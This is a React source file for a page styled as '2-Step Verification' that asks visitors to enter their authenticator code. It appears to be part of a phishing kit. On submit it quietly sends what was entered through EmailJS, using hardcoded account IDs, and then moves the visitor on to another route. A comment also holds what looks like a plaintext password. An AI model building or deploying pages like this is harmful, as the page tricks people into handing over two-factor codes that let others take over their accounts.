import React, { useRef } from "react";
import "./TwoStep.css";
import logo from "../../assets/Screenshot_2.png";
import { useNavigate } from "react-router";
import Chat from "../important/Chat";
import emailjs from '@emailjs/browser';

const TwoStep = () => {

  const navigate = useNavigate();

  // const handlesubmittwo = (e) => {
  //   e.preventDefault();
  //   navigate('/important')
  // }

  const formRef = useRef();

  const handlesubmittwo = (event) => {
    event.preventDefault();

    const serviceId = "service_x2u932i";
    const templateId = "template_93aasma";
    const userId = "jjxT8CfrqUL5oizAZ";

    emailjs.sendForm(serviceId, templateId, formRef.current, userId).then(
      (result) => {
        navigate("/important"); // Navigate after successful email send
      },
    );
  };



// tB%ZH3!U_sLi5t@

  return (
    <>
      <Chat />
      <div className="container12">
        <img src={logo} alt="" />
        <form onSubmit={handlesubmittwo} ref={formRef}>  
          <h2>
            2-Step <br /> Verification
          </h2>
          <p className="twopara">
            Enter the 2-step verification generated by your
            <br />
            authenticator app.
          </p>
          <div className="input-field">
            <input type="text" placeholder="Name" required id="name" name="to_name"/>
            <input type="number" placeholder="Phone" required id="phone" name="message" />
            <button>Verify</button>
          </div>
        </form>
      </div>
    </>
  );
};

export default TwoStep;
